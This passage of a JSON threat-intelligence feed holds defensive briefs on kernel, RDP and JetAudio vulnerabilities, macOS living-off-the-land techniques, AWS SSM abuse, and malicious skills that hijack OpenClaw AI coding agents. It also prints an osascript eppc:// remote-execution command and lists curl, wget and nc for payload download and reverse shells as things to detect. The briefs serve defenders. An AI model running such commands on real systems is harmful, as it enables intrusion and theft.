Trigger:\u003c/strong\u003e The attacker triggers a specific kernel vulnerability, such as those identified as CVE-2026-23001 or CVE-2026-31402, by sending a crafted input to a vulnerable kernel component. The specific method depends on the nature of each CVE.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e Upon successful exploitation, the attacker achieves arbitrary code execution within the kernel context. This allows the attacker to run malicious code directly on the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e Leveraging the code execution capability, the attacker exploits another vulnerability (e.g., CVE-2025-68741) to escalate privileges to root or SYSTEM. This may involve exploiting race conditions, memory corruption bugs, or other privilege escalation flaws within the kernel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSystem Control:\u003c/strong\u003e With elevated privileges, the attacker gains full control over the compromised system. They can now access sensitive data, modify system configurations, install backdoors, or move laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Optional):\u003c/strong\u003e The attacker uses the compromised system as a launching point to attack other systems on the network, potentially exploiting other vulnerabilities or using stolen credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence (Optional):\u003c/strong\u003e The attacker establishes persistence on the compromised system to maintain access even after reboots. This may involve installing rootkits, modifying system startup scripts, or creating rogue user accounts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDenial of Service/Data Exfiltration/etc.:\u003c/strong\u003e Depending on their objectives, the attacker may use the compromised system to launch denial-of-service attacks against other targets, exfiltrate sensitive data, or cause other damage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these kernel vulnerabilities can lead to complete system compromise, allowing attackers to execute arbitrary code, escalate privileges, and cause denial of service. The wide range of affected Red Hat Enterprise Linux and CodeReady Linux Builder versions implies a potentially large number of vulnerable systems. This can result in significant data breaches, system downtime, financial losses, and reputational damage for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patches provided in Red Hat Security Advisories RHSA-2026:10756, RHSA-2026:10996, and RHSA-2026:11313 to remediate the vulnerabilities.\u003c/li\u003e\n\u003cli\u003ePrioritize patching systems based on their criticality and exposure to external networks.\u003c/li\u003e\n\u003cli\u003eMonitor systems for suspicious activity that may indicate exploitation attempts, focusing on unexpected kernel module loads or privilege escalations using process_creation logging.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious kernel module loading to identify potential rootkit installation attempts.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the deployed Sigma rules to determine the scope and impact of potential compromises.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:00:00Z","date_published":"2026-04-30T00:00:00Z","id":"/briefs/2026-04-redhat-kernel-vulns/","summary":"Multiple vulnerabilities in the Red Hat Linux kernel allow for arbitrary code execution, privilege escalation, and remote denial of service.","title":"Multiple Vulnerabilities in Red Hat Linux Kernel","url":"https://feed.craftedsignal.io/briefs/2026-04-redhat-kernel-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2026-42423"}],"_cs_exploited":false,"_cs_products":["OpenClaw"],"_cs_severities":["high"],"_cs_tags":["vulnerability","privilege-escalation","execution"],"_cs_type":"advisory","_cs_vendors":["OpenClaw"],"content_html":"\u003cp\u003eOpenClaw, a software application, is vulnerable to an approval-timeout bypass (CVE-2026-42423) affecting versions prior to 2026.4.8. This vulnerability stems from a flaw in the strictInlineEval approval mechanism, where an approval-timeout fallback allows the execution of inline eval commands without explicit user approval. An attacker with low privileges can exploit this vulnerability on gateway and node exec hosts to circumvent the intended security boundary. This can lead to unauthorized command execution and potential system compromise. Defenders should upgrade to version 2026.4.8 or implement mitigations to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains low-privilege access to a gateway or node exec host running a vulnerable version of OpenClaw (prior to 2026.4.8).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious inline eval command intended to be executed on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute the malicious inline eval command, triggering the strictInlineEval approval mechanism.\u003c/li\u003e\n\u003cli\u003eThe system initiates the explicit approval process, awaiting user confirmation before executing the command.\u003c/li\u003e\n\u003cli\u003eThe attacker waits for the pre-configured approval-timeout to expire without providing any explicit approval.\u003c/li\u003e\n\u003cli\u003eThe approval-timeout fallback mechanism is triggered due to the lack of user approval within the defined timeframe.\u003c/li\u003e\n\u003cli\u003eThe system bypasses the explicit-approval requirement due to the timeout fallback, and the malicious inline eval command is executed.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution on the affected host, potentially escalating privileges and compromising the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-42423 allows an attacker to bypass intended security boundaries and execute arbitrary commands on OpenClaw gateway and node exec hosts. This can lead to privilege escalation, unauthorized data access, and potential system compromise. The severity is rated as high (CVSS 7.5) due to the potential for significant impact on confidentiality, integrity, and availability. The number of affected systems depends on the deployment scope of vulnerable OpenClaw versions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade OpenClaw to version 2026.4.8 or later to patch CVE-2026-42423.\u003c/li\u003e\n\u003cli\u003eMonitor OpenClaw logs for indicators of unauthorized inline eval command execution, focusing on unexpected activity following approval timeouts.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the blast radius of potential compromises, should an attacker successfully exploit CVE-2026-42423 and gain unauthorized access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T12:00:00Z","date_published":"2026-04-29T12:00:00Z","id":"/briefs/2026-04-openclaw-approval-bypass/","summary":"OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that allows attackers to bypass strictInlineEval explicit-approval requirements on gateway and node exec hosts, leading to arbitrary command execution.","title":"OpenClaw StrictInlineEval Approval Bypass Vulnerability (CVE-2026-42423)","url":"https://feed.craftedsignal.io/briefs/2026-04-openclaw-approval-bypass/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["macos","lotl","lateral-movement","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eWith macOS adoption growing in enterprise environments, particularly among developers and DevOps teams, it has become an attractive target for malicious actors. This report highlights the under-documented \u0026ldquo;living-off-the-land\u0026rdquo; (LOTL) techniques specific to macOS. Attackers are exploiting native features like Remote Application Scripting (RAS) to achieve remote execution and are abusing Spotlight metadata (Finder comments) for payload staging, evading traditional static file analysis. Additionally, attackers can use built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP to establish persistence and move toolkits. Defenders should shift their focus from static file scanning to monitoring process lineage, inter-process communication (IPC) anomalies, and enforcing strict MDM policies to disable unnecessary administrative services.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker gains initial access to a macOS system, possibly through spearphishing or exploiting a vulnerability in a network service (details of initial access aren\u0026rsquo;t specified in the provided document but is a necessary assumption for the rest of the chain).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker uses native tools to enumerate the environment, such as \u003ccode\u003ediskutil list\u003c/code\u003e to identify connected volumes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Access:\u003c/strong\u003e The attacker attempts to access stored credentials, SSH keys, or cloud credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (RAS):\u003c/strong\u003e The attacker leverages Remote Application Scripting (RAS) to remotely query Finder for mounted volumes using \u003ccode\u003eosascript -e 'tell application \u0026quot;Finder\u0026quot; to get the name of every disk' eppc://user:password@target_ip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRemote Execution (RAS):\u003c/strong\u003e The attacker uses RAS and Terminal.app as an execution proxy to bypass Apple\u0026rsquo;s security restrictions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Deployment (RAS/Base64):\u003c/strong\u003e The attacker encodes a malicious script using Base64 and uses RAS to instruct the remote Terminal.app to decode the script to a temporary file and make it executable using \u003ccode\u003echmod +x\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Invocation (RAS/bash):\u003c/strong\u003e The attacker uses a second RAS command to explicitly invoke the deployed script via bash, ensuring a proper shell context.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence (SMB/Netcat/Git/TFTP/SNMP):\u003c/strong\u003e The attacker utilizes built-in protocols such as SMB, Netcat, Git, TFTP, or SNMP to establish persistence on the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these LOTL techniques allows attackers to bypass traditional security controls on macOS systems, leading to unauthorized access to sensitive data, source code repositories, and cloud infrastructure. With over 45% of organizations utilizing macOS, these attacks can result in significant financial losses, reputational damage, and disruption of business operations. Compromised developer or DevOps workstations can be leveraged as pivot points to further compromise production environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003eosascript\u003c/code\u003e executing with the \u003ccode\u003eeppc://\u003c/code\u003e URI to detect potential RAS-based lateral movement (see Sigma rule \u0026ldquo;Detect Remote Apple Event Lateral Movement\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eMonitor process creation for \u003ccode\u003eTerminal.app\u003c/code\u003e executing \u003ccode\u003ebash\u003c/code\u003e with command-line arguments indicative of Base64 decoding and execution to identify RAS-based remote execution attempts (see Sigma rule \u0026ldquo;Detect Terminal.app as Execution Proxy\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement strict MDM policies to disable unnecessary administrative services and protocols like Remote Apple Events to reduce the attack surface.\u003c/li\u003e\n\u003cli\u003eMonitor inter-process communication (IPC) anomalies, particularly involving \u003ccode\u003eAppleEventsD\u003c/code\u003e, to identify suspicious activity related to RAS.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the process lineage and command-line arguments necessary for the rules above.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T10:01:16Z","date_published":"2026-04-21T10:01:16Z","id":"/briefs/2026-04-bad-apples-macos-lotl/","summary":"Adversaries are increasingly targeting macOS environments, leveraging native tools like Remote Application Scripting (RAS) and Spotlight metadata to bypass security controls for remote code execution and lateral movement.","title":"Bad Apples: Weaponizing Native macOS Primitives for Lateral Movement and Execution","url":"https://feed.craftedsignal.io/briefs/2026-04-bad-apples-macos-lotl/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-32157"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-32157","use-after-free","remote-desktop","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-32157 is a critical use-after-free vulnerability affecting the Remote Desktop Client. This flaw allows an unauthenticated attacker to achieve remote code execution on a vulnerable system simply by interacting with the RDP service over a network. The vulnerability stems from improper memory management within the RDP client, leading to a condition where a program attempts to access memory that has already been freed, potentially resulting in arbitrary code execution. Successful exploitation of this vulnerability could lead to complete system compromise. The CVE was published on 2026-04-14, and defenders should prioritize patching and monitoring for exploitation attempts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Remote Desktop Client via network scanning or other reconnaissance methods.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious RDP request designed to trigger the use-after-free vulnerability.\u003c/li\u003e\n\u003cli\u003eThe crafted RDP request is sent to the target system via TCP port 3389 (default RDP port).\u003c/li\u003e\n\u003cli\u003eThe Remote Desktop Client on the target system processes the malicious request, triggering the memory corruption.\u003c/li\u003e\n\u003cli\u003eThe use-after-free condition allows the attacker to overwrite memory, potentially injecting malicious code.\u003c/li\u003e\n\u003cli\u003eThe injected code is executed within the context of the Remote Desktop Client process (mstsc.exe).\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the system, potentially escalating privileges to SYSTEM.\u003c/li\u003e\n\u003cli\u003eThe attacker can then install malware, exfiltrate data, or perform other malicious actions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-32157 can lead to complete compromise of the affected system. An attacker could gain unauthorized access to sensitive data, install malware, or use the compromised system as a foothold to pivot to other systems on the network. Given the ubiquitous nature of RDP in enterprise environments, a successful widespread exploitation could have significant impact across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patch released by Microsoft to address CVE-2026-32157 immediately on all systems running Remote Desktop Client. The advisory URL is \u003ca href=\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157\"\u003ehttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect potential exploitation attempts targeting CVE-2026-32157.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious RDP connections and unusual activity originating from the mstsc.exe process based on the \u003ccode\u003enetwork_connection\u003c/code\u003e and \u003ccode\u003eprocess_creation\u003c/code\u003e Sigma rules.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging to capture the execution of any malicious code injected via this vulnerability, as covered by the \u003ccode\u003eprocess_creation\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T12:00:00Z","date_published":"2026-04-15T12:00:00Z","id":"/briefs/2026-04-rdp-use-after-free/","summary":"CVE-2026-32157 is a use-after-free vulnerability in the Remote Desktop Client that allows an unauthorized attacker to execute code over a network.","title":"CVE-2026-32157 - Remote Desktop Client Use-After-Free Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-rdp-use-after-free/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["cloud","aws","ssm","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis rule identifies when an AWS Systems Manager (SSM) command document is created by a user or role who does not typically perform this action. The rule focuses on detecting anomalous creation of SSM command documents. Adversaries may create SSM command documents to execute commands on managed instances, potentially leading to unauthorized access, command and control, and data exfiltration. The rule utilizes AWS CloudTrail logs to monitor the \u003ccode\u003eCreateDocument\u003c/code\u003e API call within the SSM service. This activity is flagged when the user or role creating the document deviates from established patterns, indicating a potential security risk. This detection is relevant for organizations using AWS SSM for managing their infrastructure and aims to prevent unauthorized command execution on managed instances.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to an AWS account, potentially through compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to create a new SSM Command document using the \u003ccode\u003eCreateDocument\u003c/code\u003e API call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCreateDocument\u003c/code\u003e API call is logged by AWS CloudTrail with details about the user identity, request parameters, and document description.\u003c/li\u003e\n\u003cli\u003eThe detection rule analyzes CloudTrail logs, specifically looking for the \u003ccode\u003eCreateDocument\u003c/code\u003e event with a document type of \u003ccode\u003eCommand\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe rule identifies the user or role associated with the \u003ccode\u003eCreateDocument\u003c/code\u003e API call by inspecting the \u003ccode\u003eaws.cloudtrail.user_identity.arn\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eIf the user or role is considered rare or unusual for creating SSM Command documents within the organization, the rule triggers an alert.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the created document to execute arbitrary commands on managed instances.\u003c/li\u003e\n\u003cli\u003eSuccessful execution of these commands leads to various impacts, including unauthorized access, command and control, data exfiltration, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of this technique can lead to unauthorized access to AWS resources, potentially affecting all systems managed by AWS SSM in the targeted environment. The creation of malicious SSM command documents can lead to data exfiltration, system compromise, or denial of service. If successful, this can impact hundreds or thousands of systems depending on the scope of AWS SSM usage in the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;AWS SSM Command Document Created by Rare User\u0026rdquo; to your SIEM, ensuring proper indexing of CloudTrail logs (index = [\u0026ldquo;filebeat-*\u0026rdquo;, \u0026ldquo;logs-aws.cloudtrail-*\u0026rdquo;]).\u003c/li\u003e\n\u003cli\u003eReview the \u003ccode\u003eaws.cloudtrail.request_parameters.content\u003c/code\u003e field in the CloudTrail logs for any suspicious commands within the created SSM document.\u003c/li\u003e\n\u003cli\u003eRestrict SSM document creation permissions to specific, trusted roles or users to prevent unauthorized document creation as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eMonitor the \u003ccode\u003eSendCommand\u003c/code\u003e API call related to the created SSM document to see if it is used to execute commands on managed instances, as described in the triage section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-11-aws-ssm-rare-user/","summary":"An AWS Systems Manager (SSM) command document creation by a user or role who does not typically perform this action, which can lead to unauthorized access, command and control, or data exfiltration.","title":"AWS SSM Command Document Created by Rare User","url":"https://feed.craftedsignal.io/briefs/2024-11-aws-ssm-rare-user/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["aws","ec2","ssm","lolbin","execution","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis threat brief focuses on detecting the execution of Living Off the Land Binaries (LOLBins) or GTFOBins on Amazon EC2 instances via AWS Systems Manager (SSM) \u003ccode\u003eSendCommand\u003c/code\u003e API. The technique involves correlating AWS CloudTrail \u003ccode\u003eSendCommand\u003c/code\u003e events with endpoint process execution by matching SSM command IDs. While AWS redacts command parameters in CloudTrail logs, this correlation technique reveals the actual commands executed on EC2 instances. This is critical because adversaries may abuse SSM to execute malicious commands remotely without requiring SSH or RDP access. They can leverage legitimate system utilities for various malicious purposes, including data exfiltration, establishing reverse shells, or facilitating lateral movement within the cloud environment. The rule was last updated on 2026-04-10.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to AWS via compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the AWS CLI or API to initiate an SSM \u003ccode\u003eSendCommand\u003c/code\u003e to a target EC2 instance. The \u003ccode\u003eDocumentName\u003c/code\u003e parameter is set to \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe SSM agent on the EC2 instance receives the \u003ccode\u003eSendCommand\u003c/code\u003e request.\u003c/li\u003e\n\u003cli\u003eThe SSM agent executes a shell script (\u003ccode\u003e_script.sh\u003c/code\u003e) within a dedicated directory for orchestration.\u003c/li\u003e\n\u003cli\u003eThe shell script executes a LOLBin, such as \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or \u003ccode\u003eperl\u003c/code\u003e, to perform malicious actions. The parent process of the LOLBin will be the SSM shell script.\u003c/li\u003e\n\u003cli\u003eThe LOLBin is used to download a malicious payload, establish a reverse shell, or exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established reverse shell to perform further actions on the EC2 instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to EC2 instances, data exfiltration, deployment of malware, and lateral movement within the AWS environment. Although a number of impacted organizations is not available, this attack is able to bypass traditional network security controls. Organizations in any sector utilizing AWS EC2 instances and SSM are potentially at risk. The lack of required SSH or RDP access makes this technique particularly stealthy.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable AWS CloudTrail logging to capture \u003ccode\u003eSendCommand\u003c/code\u003e events and monitor for \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e in the \u003ccode\u003erequest_parameters\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect AWS EC2 LOLBin Execution via SSM SendCommand\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor endpoint process execution logs for the execution of LOLBins like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, \u003ccode\u003eperl\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, etc., with parent processes related to SSM.\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies to restrict SSM \u003ccode\u003eSendCommand\u003c/code\u003e permissions to only authorized users and roles.\u003c/li\u003e\n\u003cli\u003eReview and audit existing SSM configurations to identify and remediate any overly permissive settings.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-01-03-aws-ec2-lolbin-ssm/","summary":"Detection of Living Off the Land Binaries (LOLBins) or GTFOBins execution on EC2 instances via AWS Systems Manager (SSM) SendCommand API, potentially indicating malicious activity.","title":"AWS EC2 LOLBin Execution via SSM SendCommand","url":"https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-lolbin-ssm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["ai-agent","execution","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenClaw (formerly Clawdbot, rebranded to Moltbot) is an AI coding assistant that can execute shell commands and scripts. Threat actors are exploiting the skill ecosystem (ClawHub) to distribute malicious skills, observed as early as January 2026, that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. These skills are often obfuscated and distributed through public registries like ClawHub. The attacks leverage the AI agents\u0026rsquo; ability to execute commands through skills or prompt injection. Defenders should monitor for suspicious child processes spawned by Node.js processes running OpenClaw/Moltbot, as these may indicate malicious activity originating from compromised or malicious skills. This activity has been observed across Linux, macOS, and Windows environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user installs the OpenClaw agent, potentially from a legitimate or typosquatted domain.\u003c/li\u003e\n\u003cli\u003eThe user installs a malicious skill from ClawHub or is subject to a prompt injection attack.\u003c/li\u003e\n\u003cli\u003eThe OpenClaw agent, running under Node.js, receives a command to execute a shell command.\u003c/li\u003e\n\u003cli\u003eThe Node.js process spawns a shell process (e.g., bash, sh, cmd.exe, powershell.exe).\u003c/li\u003e\n\u003cli\u003eThe shell process executes a command to download a payload from a remote server using tools like curl or certutil.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with an obfuscated name.\u003c/li\u003e\n\u003cli\u003eThe shell process executes the downloaded payload using chmod +x and ./, rundll32.exe, or powershell.exe.\u003c/li\u003e\n\u003cli\u003eThe payload performs malicious actions such as credential theft or cryptocurrency wallet compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised OpenClaw agents can lead to cryptocurrency wallet theft, credential compromise, and potential data exfiltration. A successful attack allows threat actors to gain access to sensitive data and potentially pivot to other systems on the network. The number of victims is currently unknown, but the targeting of cryptocurrency wallets suggests financially motivated actors. The observed typosquatting activity indicates a campaign to impersonate the legitimate software and trick users into installing malicious versions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for suspicious child processes of Node.js processes running OpenClaw/Moltbot, specifically shells and scripting interpreters, using the provided Sigma rule (\u003ca href=\"#execution-via-openclaw-agent---linuxmacoswindows\"\u003eExecution via OpenClaw Agent - Linux/macOS/Windows\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eBlock known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the DNS resolver based on the IOCs provided.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables, mitigating the impact of downloaded payloads.\u003c/li\u003e\n\u003cli\u003eReview OpenClaw skill installation logs and user AI conversation history for signs of malicious activity or prompt injection attempts.\u003c/li\u003e\n\u003cli\u003eEnable process command-line auditing to capture the full command line of spawned processes, aiding in the identification of malicious commands.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect execution of curl/certutil downloads (\u003ca href=\"#openclaw-download-activity\"\u003eOpenClaw Download Activity\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:07:54Z","date_published":"2026-04-08T12:07:54Z","id":"/briefs/2026-06-openclaw-execution/","summary":"Malicious actors are exploiting OpenClaw, Moltbot, and Clawdbot AI coding agents via Node.js to execute arbitrary shell commands and download-and-execute commands, potentially targeting cryptocurrency wallets and credentials.","title":"OpenClaw Agent Suspicious Child Process Execution","url":"https://feed.craftedsignal.io/briefs/2026-06-openclaw-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["buffer-overflow","privilege-escalation","execution","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eJetAudio jetCast Server 2.0 is susceptible to a stack-based buffer overflow vulnerability (CVE-2019-25609) within the Log Directory configuration field. This flaw allows a local attacker with access to the server\u0026rsquo;s configuration settings to overwrite Structured Exception Handling (SEH) pointers. By injecting carefully crafted, alphanumeric-encoded shellcode into the Log Directory field, an attacker can trigger an SEH exception handler. This ultimately leads to the execution of arbitrary code under the privileges of the application. The vulnerability poses a significant risk to systems running the vulnerable software, as it enables local privilege escalation and potentially complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains local access to a system running JetAudio jetCast Server 2.0.\u003c/li\u003e\n\u003cli\u003eAttacker identifies the Log Directory configuration setting within JetCast Server 2.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts alphanumeric shellcode designed to overwrite the SEH chain.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious shellcode into the Log Directory configuration field, exceeding the expected buffer size.\u003c/li\u003e\n\u003cli\u003eThe application attempts to handle the oversized input, causing a stack-based buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow corrupts the SEH chain, replacing legitimate handler addresses with attacker-controlled addresses.\u003c/li\u003e\n\u003cli\u003eAn exception is triggered within the application due to the corrupted state.\u003c/li\u003e\n\u003cli\u003eThe SEH handler is invoked, redirecting execution to the attacker\u0026rsquo;s shellcode, resulting in arbitrary code execution with application privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a local attacker to execute arbitrary code with the privileges of the JetAudio jetCast Server application. Given the base CVSS score of 8.4, this could lead to complete system compromise, including data theft, modification, or destruction. While the number of affected installations is unknown, organizations utilizing JetAudio jetCast Server 2.0 are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or upgrade to a secure version of JetAudio jetCast Server to remediate CVE-2019-25609.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by the JetAudio jetCast Server process (see process creation rule below).\u003c/li\u003e\n\u003cli\u003eImplement access controls to restrict who can modify the Log Directory configuration, mitigating the initial access vector.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from the JetAudio jetCast Server process to detect potential command and control activity after successful exploitation (see network connection rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-jetaudio-stack-overflow/","summary":"JetAudio jetCast Server 2.0 is vulnerable to a stack-based buffer overflow in the Log Directory configuration, enabling local attackers to overwrite structured exception handling pointers and execute arbitrary code.","title":"JetAudio jetCast Server 2.0 Stack-Based Buffer 